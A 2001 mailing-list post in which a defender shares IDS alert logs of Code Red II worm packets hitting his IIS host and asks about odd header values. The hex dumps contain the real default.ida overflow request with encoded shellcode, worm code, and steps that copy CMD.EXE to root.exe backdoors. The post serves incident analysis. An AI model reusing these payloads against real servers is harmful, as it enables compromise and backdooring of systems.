Hey all, As a follow-up to what I posted before. Here's what I'm seeing from a single host: 1. .ida attempt dlen=576 length=536 win=5360 TOS=0 TTL=124 Seq=[...]0257 Ack=[...]0956 chksum=58853 ACK <identical packet> 2. .ida attempt dlen=564 length=479 win=6432 TOS=16 TTL=255 Seq=[...]9607 Ack=[...]9607 chksum=55438 ACK-PSH <identical packet> 3. coderedII attempt dlen=576 length=536 win=5360 TOS=0 TTL=124 Seq=[...]0793 Ack=[...]0956 chksum=58852 ACK <identical packet> 4. coderedII attempt dlen=413 length=373 win=7504 TOS=16 TTL=255 Seq=[...]4487 Ack=[...]3863 chksum=40789 ACK-PSH <identical packet> 5. cmd.exe access dlen=576 length=536 win=5360 TOS=0 TTL=124 Seq=[...]1865 Ack=[...]0956 chksum=58849 ACK <identical packet> 6. cmd.exe access dlen=981 length=941 win=10720 TOS=16 TTL=255 Seq=[...]2071 Ack=[...]4871 chksum=40339 ACK-PSH <identical packet> Note: Each "series" is from the same src port Packet #2 has same seq/ack #s Packet #2 has a strange dlen=564 while length=479 The first packet in each attack (#1, #3, #5) is nearly identical; even the ack # Also note window=5360 when length=536 (10x) TTLs go from 124->255 between the first and second packets TOS goes from 0->16 between the first and second packets The full traces are below. The source is in the same class A as I (cable modem). Any ideas? -- Brent Deterding #(1 - 8922) [2001-08-05 19:45:38] [arachNIDS/552] WEB-IIS ISAPI .ida attempt IPv4: 24.217.103.179 -> 192.168.1.50 hlen=5 TOS=0 dlen=576 ID=54379 flags=0 offset=0 TTL=124 chksum=58853 TCP: port=1894 -> dport: 80 flags=***A**** seq=1997560257 ack=1559690956 off=5 res=0 win=5360 urp=0 chksum=59530 Payload: length = 536 000 : 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61 GET /default.ida 010 : 3F 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 ?XXXXXXXXXXXXXXX 020 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 030 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 040 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 050 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 060 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 070 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 080 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 090 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 0a0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 0b0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 0c0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 0d0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 0e0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 0f0 : 58 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 X%u9090%u6858%uc 100 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 110 : 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30 u6858%ucbd3%u780 120 : 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 1%u9090%u6858%uc 130 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 140 : 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63 u9090%u8190%u00c 150 : 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35 3%u0003%u8b00%u5 160 : 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25 31b%u53ff%u0078% 170 : 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54 u0000%u00=a HTT 180 : 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74 P/1.0..Content-t 190 : 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 43 6F ype: text/xml.Co 1a0 : 6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 33 ntent-length: 33 1b0 : 37 39 20 0D 0A 0D 0A C8 C8 01 00 60 E8 03 00 00 79 ........`.... 1c0 : 00 CC EB FE 64 67 FF 36 00 00 64 67 89 26 00 00 ....dg.6..dg.&.. 1d0 : E8 DF 02 00 00 68 04 01 00 00 8D 85 5C FE FF FF .....h......\... 1e0 : 50 FF 55 9C 8D 85 5C FE FF FF 50 FF 55 98 8B 40 P.U...\...P.U..@ 1f0 : 10 8B 08 89 8D 58 FE FF FF FF 55 E4 3D 04 04 00 .....X....U.=... 200 : 00 0F 94 C1 3D 04 08 00 00 0F 94 C5 0A CD 0F B6 ....=........... 210 : C9 89 8D 54 FE FF FF 8B ...T.... ------------------------------------------------------------------------ ------ <identical packet to above> ------------------------------------------------------------------------ ------ #(1 - 8924) [2001-08-05 19:45:38] [arachNIDS/552] WEB-IIS ISAPI .ida attempt IPv4: 24.217.103.179 -> 192.168.1.50 hlen=5 TOS=16 dlen=565 ID=0 flags=0 offset=0 TTL=255 chksum=55438 TCP: port=1894 -> dport: 80 flags=***AP*** seq=3243839607 ack=3243839607 off=5 res=0 win=6432 urp=0 chksum=47658 Payload: length = 479 000 : 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61 GET /default.ida 010 : 3F 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 ?XXXXXXXXXXXXXXX 020 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 030 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 040 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 050 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 060 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 070 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 080 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 090 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 0a0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 0b0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 0c0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 0d0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 0e0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 0f0 : 58 00 30 39 30 00 38 35 38 00 62 64 33 00 38 30 X.090.858.bd3.80 100 : 31 00 30 39 30 00 38 35 38 00 62 64 33 00 38 30 1.090.858.bd3.80 110 : 31 00 30 39 30 00 38 35 38 00 62 64 33 00 38 30 1.090.858.bd3.80 120 : 31 00 30 39 30 00 30 39 30 00 31 39 30 00 30 63 1.090.090.190.0c 130 : 33 00 30 30 33 00 62 30 30 00 33 31 62 00 33 66 3.003.b00.31b.3f 140 : 66 00 30 37 38 00 30 30 30 00 30 3D 61 20 20 48 f.078.000.0=a H 150 : 54 54 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 TTP/1.0..Content 160 : 2D 74 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A -type: text/xml. 170 : 43 6F 6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 Content-length: 180 : 33 33 37 39 20 0D 0A 0D 0A C8 C8 01 00 60 E8 03 3379 ........`.. 190 : 00 00 00 CC EB FE 64 67 FF 36 00 00 64 67 89 26 ......dg.6..dg.& 1a0 : 00 00 E8 DF 02 00 00 68 04 01 00 00 8D 85 5C FE .......h......\. 1b0 : FF FF 50 FF 55 9C 8D 85 5C FE FF FF 50 FF 55 98 ..P.U...\...P.U. 1c0 : 8B 40 10 8B 08 89 8D 58 FE FF FF FF 55 E4 3D 04 .@.....X....U.=. 1d0 : 04 00 00 0F 94 C1 3D 04 08 00 00 0F 94 C5 0A ......=........ ------------------------------------------------------------------------ ------ <identical packet to above> ------------------------------------------------------------------------ ------ #(1 - 8926) [2001-08-05 19:45:38] CodeRedII Overflow IPv4: 24.217.103.179 -> 192.168.1.50 hlen=5 TOS=0 dlen=576 ID=54380 flags=0 offset=0 TTL=124 chksum=58852 TCP: port=1894 -> dport: 80 flags=***A**** seq=1997560793 ack=1559690956 off=5 res=0 win=5360 urp=0 chksum=19961 Payload: length = 536 000 : 75 08 81 7E 30 9A 02 00 00 0F 84 C4 00 00 00 C7 u..~0........... 010 : 46 30 9A 02 00 00 E8 0A 00 00 00 43 6F 64 65 52 F0.........CodeR 020 : 65 64 49 49 00 8B 1C 24 FF 55 D8 66 0B C0 0F 95 edII...$.U.f.... 030 : 85 38 FE FF FF C7 85 50 FE FF FF 01 00 00 00 6A .8.....P.......j 040 : 00 8D 85 50 FE FF FF 50 8D 85 38 FE FF FF 50 8B ...P...P..8...P. 050 : 45 08 FF 70 08 FF 90 84 00 00 00 80 BD 38 FE FF E..p.........8.. 060 : FF 01 74 68 53 FF 55 D4 FF 55 EC 01 45 84 69 BD ..thS.U..U..E.i. 070 : 54 FE FF FF 2C 01 00 00 81 C7 2C 01 00 00 E8 D2 T...,.....,..... 080 : 04 00 00 F7 D0 0F AF C7 89 46 34 8D 45 88 50 6A .........F4.E.Pj 090 : 00 FF 75 08 E8 05 00 00 00 E9 01 FF FF FF 6A 00 ..u...........j. 0a0 : 6A 00 FF 55 F0 50 FF 55 D0 4F 75 D2 E8 3B 05 00 j..U.P.U.Ou..;.. 0b0 : 00 69 BD 54 FE FF FF 00 5C 26 05 81 C7 00 5C 26 .i.T....\&....\& 0c0 : 05 57 FF 55 E8 6A 00 6A 16 FF 55 8C 6A FF FF 55 .W.U.j.j..U.j..U 0d0 : E8 EB F9 8B 46 34 29 45 84 6A 64 FF 55 E8 8D 85 ....F4)E.jd.U... 0e0 : 3C FE FF FF 50 FF 55 C0 0F B7 85 3C FE FF FF 3D <...P.U....<...= 0f0 : D2 07 00 00 73 CF 0F B7 85 3E FE FF FF 83 F8 0A ....s....>...... 100 : 73 C3 66 C7 85 70 FF FF FF 02 00 66 C7 85 72 FF s.f..p.....f..r. 110 : FF FF 00 50 E8 64 04 00 00 89 9D 74 FF FF FF 6A ...P.d.....t...j 120 : 00 6A 01 6A 02 FF 55 B8 83 F8 FF 74 F2 89 45 80 .j.j..U....t..E. 130 : 6A 01 54 68 7E 66 04 80 FF 75 80 FF 55 A4 59 6A j.Th~f...u..U.Yj 140 : 10 8D 85 70 FF FF FF 50 FF 75 80 FF 55 B0 BB 01 ...p...P.u..U... 150 : 00 00 00 0B C0 74 4B 33 DB FF 55 94 3D 33 27 00 .....tK3..U.=3'. 160 : 00 75 3F C7 85 68 FF FF FF 0A 00 00 00 C7 85 6C .u?..h.........l 170 : FF FF FF 00 00 00 00 C7 85 60 FF FF FF 01 00 00 .........`...... 180 : 00 8B 45 80 89 85 64 FF FF FF 8D 85 68 FF FF FF ..E...d.....h... 190 : 50 6A 00 8D 85 60 FF FF FF 50 6A 00 6A 01 FF 55 Pj...`...Pj.j..U 1a0 : A0 93 6A 00 54 68 7E 66 04 80 FF 75 80 FF 55 A4 ..j.Th~f...u..U. 1b0 : 59 83 FB 01 75 31 E8 00 00 00 00 58 2D D3 03 00 Y...u1.....X-... 1c0 : 00 6A 00 68 EA 0E 00 00 50 FF 75 80 FF 55 AC 3D .j.h....P.u..U.= 1d0 : EA 0E 00 00 75 11 6A 00 6A 01 8D 85 5C FE FF FF ....u.j.j...\... 1e0 : 50 FF 75 80 FF 55 A8 FF 75 80 FF 55 B4 E9 E7 FE P.u..U..u..U.... 1f0 : FF FF BB 00 00 DF 77 81 C3 00 00 01 00 81 FB 00 ......w......... 200 : 00 00 78 75 05 BB 00 00 F0 BF 60 E8 0E 00 00 00 ..xu......`..... 210 : 8B 64 24 08 64 67 8F 06 .d$.dg.. ------------------------------------------------------------------------ ------ <identical packet to above> ------------------------------------------------------------------------ ------ #(1 - 8928) [2001-08-05 19:45:38] CodeRedII Overflow IPv4: 24.217.103.179 -> 192.168.1.50 hlen=5 TOS=16 dlen=413 ID=0 flags=0 offset=0 TTL=255 chksum=40789 TCP: port=1894 -> dport: 80 flags=***AP*** seq=3462074487 ack=3646623863 off=5 res=0 win=7504 urp=0 chksum=59337 Payload: length = 373 000 : CD 0F B6 C9 89 8D 54 FE FF FF 8B 75 08 81 7E 30 ......T....u..~0 010 : 9A 02 00 00 0F 84 C4 00 00 00 C7 46 30 9A 02 00 ...........F0... 020 : 00 E8 0A 00 00 00 43 6F 64 65 52 65 64 49 49 00 ......CodeRedII. 030 : 8B 1C 24 FF 55 D8 66 0B C0 0F 95 85 38 FE FF FF ..$.U.f.....8... 040 : C7 85 50 FE FF FF 01 00 00 00 6A 00 8D 85 50 FE ..P.......j...P. 050 : FF FF 50 8D 85 38 FE FF FF 50 8B 45 08 FF 70 08 ..P..8...P.E..p. 060 : FF 90 84 00 00 00 80 BD 38 FE FF FF 01 74 68 53 ........8....thS 070 : FF 55 D4 FF 55 EC 01 45 84 69 BD 54 FE FF FF 2C .U..U..E.i.T..., 080 : 01 00 00 81 C7 2C 01 00 00 E8 D2 04 00 00 F7 D0 .....,.......... 090 : 0F AF C7 89 46 34 8D 45 88 50 6A 00 FF 75 08 E8 ....F4.E.Pj..u.. 0a0 : 05 00 00 00 E9 01 FF FF FF 6A 00 6A 00 FF 55 F0 .........j.j..U. 0b0 : 50 FF 55 D0 4F 75 D2 E8 3B 05 00 00 69 BD 54 FE P.U.Ou..;...i.T. 0c0 : FF FF 00 5C 26 05 81 C7 00 5C 26 05 57 FF 55 E8 ...\&....\&.W.U. 0d0 : 6A 00 6A 16 FF 55 8C 6A FF FF 55 E8 EB F9 8B 46 j.j..U.j..U....F 0e0 : 34 29 45 84 6A 64 FF 55 E8 8D 85 3C FE FF FF 50 4)E.jd.U...<...P 0f0 : FF 55 C0 0F B7 85 3C FE FF FF 3D D2 07 00 00 73 .U....<...=....s 100 : CF 0F B7 85 3E FE FF FF 83 F8 0A 73 C3 66 C7 85 ....>......s.f.. 110 : 70 FF FF FF 02 00 66 C7 85 72 FF FF FF 00 50 E8 p.....f..r....P. 120 : 64 04 00 00 89 9D 74 FF FF FF 6A 00 6A 01 6A 02 d.....t...j.j.j. 130 : FF 55 B8 83 F8 FF 74 F2 89 45 80 6A 01 54 68 7E .U....t..E.j.Th~ 140 : 66 04 80 FF 75 80 FF 55 A4 59 6A 10 8D 85 70 FF f...u..U.Yj...p. 150 : FF FF 50 FF 75 80 FF 55 B0 BB 01 00 00 00 0B C0 ..P.u..U........ 160 : 74 4B 33 DB FF 55 94 3D 33 27 00 00 75 3F C7 85 tK3..U.=3'..u?.. 170 : 68 FF FF FF 0A h.... ------------------------------------------------------------------------ ------ <identical packet to above> ------------------------------------------------------------------------ ------ #(1 - 8930) [2001-08-05 19:45:38] WEB-IIS cmd.exe access IPv4: 24.217.103.179 -> 192.168.1.50 hlen=5 TOS=0 dlen=576 ID=54383 flags=0 offset=0 TTL=124 chksum=58849 TCP: port=1894 -> dport: 80 flags=***A**** seq=1997561865 ack=1559690956 off=5 res=0 win=5360 urp=0 chksum=1862 Payload: length = 536 000 : F4 89 45 BC E8 07 00 00 00 73 6F 63 6B 65 74 00 ..E......socket. 010 : FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 00 00 63 6C .u..U..E......cl 020 : 6F 73 65 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 osesocket..u..U. 030 : 89 45 B4 E8 0C 00 00 00 69 6F 63 74 6C 73 6F 63 .E......ioctlsoc 040 : 6B 65 74 00 FF 75 BC FF 55 F8 89 45 A4 E8 08 00 ket..u..U..E.... 050 : 00 00 63 6F 6E 6E 65 63 74 00 FF 75 BC FF 55 F8 ..connect..u..U. 060 : 89 45 B0 E8 07 00 00 00 73 65 6C 65 63 74 00 FF .E......select.. 070 : 75 BC FF 55 F8 89 45 A0 E8 05 00 00 00 73 65 6E u..U..E......sen 080 : 64 00 FF 75 BC FF 55 F8 89 45 AC E8 05 00 00 00 d..u..U..E...... 090 : 72 65 63 76 00 FF 75 BC FF 55 F8 89 45 A8 E8 0C recv..u..U..E... 0a0 : 00 00 00 67 65 74 68 6F 73 74 6E 61 6D 65 00 FF ...gethostname.. 0b0 : 75 BC FF 55 F8 89 45 9C E8 0E 00 00 00 67 65 74 u..U..E......get 0c0 : 68 6F 73 74 62 79 6E 61 6D 65 00 FF 75 BC FF 55 hostbyname..u..U 0d0 : F8 89 45 98 E8 10 00 00 00 57 53 41 47 65 74 4C ..E......WSAGetL 0e0 : 61 73 74 45 72 72 6F 72 00 FF 75 BC FF 55 F8 89 astError..u..U.. 0f0 : 45 94 E8 0B 00 00 00 55 53 45 52 33 32 2E 44 4C E......USER32.DL 100 : 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 00 45 78 69 L..U..E......Exi 110 : 74 57 69 6E 64 6F 77 73 45 78 00 FF 75 90 FF 55 tWindowsEx..u..U 120 : F8 89 45 8C C3 8B 45 84 69 C0 05 84 08 08 40 89 ..E...E.i.....@. 130 : 45 84 8D 84 04 78 56 34 12 F7 D8 C1 C0 08 C3 E8 E....xV4........ 140 : E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 C3 E8 ED FF ....<.t.<.t..... 150 : FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 E3 10 E8 DC ................ 160 : FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 E8 B4 FF FF ................ 170 : FF 83 E0 07 E8 20 00 00 00 FF FF FF FF 00 FF FF ..... .......... 180 : FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 00 FF ................ 190 : FF 00 00 FF FF 00 00 FF FF 59 8B 04 81 23 D8 F7 .........Y...#.. 1a0 : D0 23 85 58 FE FF FF 0B D8 80 FB 7F 74 9F 80 FB .#.X......t... 1b0 : E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 68 04 01 00 .t.;.X...t..h... 1c0 : 00 8D 85 5C FE FF FF 50 FF 55 E0 8D BC 05 5C FE ...\...P.U....\. 1d0 : FF FF E8 09 00 00 00 5C 43 4D 44 2E 45 58 45 00 .......\CMD.EXE. 1e0 : 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 00 00 64 3A ^.....cj......d: 1f0 : 5C 69 6E 65 74 70 75 62 5C 73 63 72 69 70 74 73 \inetpub\scripts 200 : 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 8D \root.exe...$... 210 : 85 5C FE FF FF 50 FF 55 .\...P.U ------------------------------------------------------------------------ ------ <identical packet to above> ------------------------------------------------------------------------ ------ #(1 - 8932) [2001-08-05 19:45:38] WEB-IIS cmd.exe access IPv4: 24.217.103.179 -> 192.168.1.50 hlen=5 TOS=16 dlen=981 ID=0 flags=0 offset=0 TTL=255 chksum=40339 TCP: port=1894 -> dport: 80 flags=***AP*** seq=777982071 ack=560074871 off=5 res=0 win=10720 urp=0 chksum=22666 Payload: length = 941 000 : 00 00 00 43 6F 70 79 46 69 6C 65 41 00 FF 75 FC ...CopyFileA..u. 010 : FF 55 F8 89 45 DC E8 10 00 00 00 47 6C 6F 62 61 .U..E......Globa 020 : 6C 46 69 6E 64 41 74 6F 6D 41 00 FF 75 FC FF 55 lFindAtomA..u..U 030 : F8 89 45 D8 E8 0F 00 00 00 47 6C 6F 62 61 6C 41 ..E......GlobalA 040 : 64 64 41 74 6F 6D 41 00 FF 75 FC FF 55 F8 89 45 ddAtomA..u..U..E 050 : D4 E8 0C 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C ......CloseHandl 060 : 65 00 FF 75 FC FF 55 F8 89 45 D0 E8 08 00 00 00 e..u..U..E...... 070 : 5F 6C 63 72 65 61 74 00 FF 75 FC FF 55 F8 89 45 _lcreat..u..U..E 080 : CC E8 08 00 00 00 5F 6C 77 72 69 74 65 00 FF 75 ......_lwrite..u 090 : FC FF 55 F8 89 45 C8 E8 08 00 00 00 5F 6C 63 6C ..U..E......_lcl 0a0 : 6F 73 65 00 FF 75 FC FF 55 F8 89 45 C4 E8 0E 00 ose..u..U..E.... 0b0 : 00 00 47 65 74 53 79 73 74 65 6D 54 69 6D 65 00 ..GetSystemTime. 0c0 : FF 75 FC FF 55 F8 89 45 C0 E8 0B 00 00 00 57 53 .u..U..E......WS 0d0 : 32 5F 33 32 2E 44 4C 4C 00 FF 55 F4 89 45 BC E8 2_32.DLL..U..E.. 0e0 : 07 00 00 00 73 6F 63 6B 65 74 00 FF 75 BC FF 55 ....socket..u..U 0f0 : F8 89 45 B8 E8 0C 00 00 00 63 6C 6F 73 65 73 6F ..E......closeso 100 : 63 6B 65 74 00 FF 75 BC FF 55 F8 89 45 B4 E8 0C cket..u..U..E... 110 : 00 00 00 69 6F 63 74 6C 73 6F 63 6B 65 74 00 FF ...ioctlsocket.. 120 : 75 BC FF 55 F8 89 45 A4 E8 08 00 00 00 63 6F 6E u..U..E......con 130 : 6E 65 63 74 00 FF 75 BC FF 55 F8 89 45 B0 E8 07 nect..u..U..E... 140 : 00 00 00 73 65 6C 65 63 74 00 FF 75 BC FF 55 F8 ...select..u..U. 150 : 89 45 A0 E8 05 00 00 00 73 65 6E 64 00 FF 75 BC .E......send..u. 160 : FF 55 F8 89 45 AC E8 05 00 00 00 72 65 63 76 00 .U..E......recv. 170 : FF 75 BC FF 55 F8 89 45 A8 E8 0C 00 00 00 67 65 .u..U..E......ge 180 : 74 68 6F 73 74 6E 61 6D 65 00 FF 75 BC FF 55 F8 thostname..u..U. 190 : 89 45 9C E8 0E 00 00 00 67 65 74 68 6F 73 74 62 .E......gethostb 1a0 : 79 6E 61 6D 65 00 FF 75 BC FF 55 F8 89 45 98 E8 yname..u..U..E.. 1b0 : 10 00 00 00 57 53 41 47 65 74 4C 61 73 74 45 72 ....WSAGetLastEr 1c0 : 72 6F 72 00 FF 75 BC FF 55 F8 89 45 94 E8 0B 00 ror..u..U..E.... 1d0 : 00 00 55 53 45 52 33 32 2E 44 4C 4C 00 FF 55 F4 ..USER32.DLL..U. 1e0 : 89 45 90 E8 0E 00 00 00 45 78 69 74 57 69 6E 64 .E......ExitWind 1f0 : 6F 77 73 45 78 00 FF 75 90 FF 55 F8 89 45 8C C3 owsEx..u..U..E.. 200 : 8B 45 84 69 C0 05 84 08 08 40 89 45 84 8D 84 04 .E.i.....@.E.... 210 : 78 56 34 12 F7 D8 C1 C0 08 C3 E8 E1 FF FF FF 3C xV4............< 220 : 00 74 F7 3C FF 74 F3 C3 E8 ED FF FF FF 8A F8 E8 .t.<.t.......... 230 : E6 FF FF FF 8A D8 C1 E3 10 E8 DC FF FF FF 8A F8 ................ 240 : E8 D5 FF FF FF 8A D8 E8 B4 FF FF FF 83 E0 07 E8 ................ 250 : 20 00 00 00 FF FF FF FF 00 FF FF FF 00 FF FF FF ............... 260 : 00 FF FF FF 00 FF FF FF 00 00 FF FF 00 00 FF FF ................ 270 : 00 00 FF FF 59 8B 04 81 23 D8 F7 D0 23 85 58 FE ....Y...#...#.X. 280 : FF FF 0B D8 80 FB 7F 74 9F 80 FB E0 74 9A 3B 9D .....t....t.;. 290 : 58 FE FF FF 74 92 C3 68 04 01 00 00 8D 85 5C FE X...t..h......\. 2a0 : FF FF 50 FF 55 E0 8D BC 05 5C FE FF FF E8 09 00 ..P.U....\...... 2b0 : 00 00 5C 43 4D 44 2E 45 58 45 00 5E FC A5 A5 A4 ..\CMD.EXE.^.... 2c0 : B3 63 6A 01 E8 1C 00 00 00 64 3A 5C 69 6E 65 74 .cj......d:\inet 2d0 : 70 75 62 5C 73 63 72 69 70 74 73 5C 72 6F 6F 74 pub\scripts\root 2e0 : 2E 65 78 65 00 8B 0C 24 88 19 8D 85 5C FE FF FF .exe...$....\... 2f0 : 50 FF 55 DC 6A 01 E8 2B 00 00 00 64 3A 5C 70 72 P.U.j..+...d:\pr 300 : 6F 67 72 61 7E 31 5C 63 6F 6D 6D 6F 6E 7E 31 5C ogra~1\common~1\ 310 : 73 79 73 74 65 6D 5C 4D 53 41 44 43 5C 72 6F 6F system\MSADC\roo 320 : 74 2E 65 78 65 00 8B 0C 24 88 19 8D 85 5C FE FF t.exe...$....\.. 330 : FF 50 FF 55 DC E8 BA 05 00 00 FC 4D 5A 50 00 02 .P.U.......MZP.. 340 : 00 00 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 ................ 350 : 00 00 00 40 00 1A FC 00 00 01 FC FC FC FC FC FC ...@............ 360 : 00 00 50 45 00 00 4C 01 03 00 FD 2A 25 29 00 00 ..PE..L....*%).. 370 : 00 00 00 00 00 00 E0 00 8F 81 0B 01 02 19 00 04 ................ 380 : 00 00 00 08 00 00 00 00 00 00 00 10 00 00 00 10 ................ 390 : 00 00 00 20 00 00 00 00 40 00 00 10 00 00 00 04 ... ....@....... 3a0 : 00 00 01 00 00 00 00 00 00 00 03 00 0A ............. ------------------------------------------------------------------------ ------ <identical packet to above> ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Mon Aug 06 2001 - 11:25:27 PDT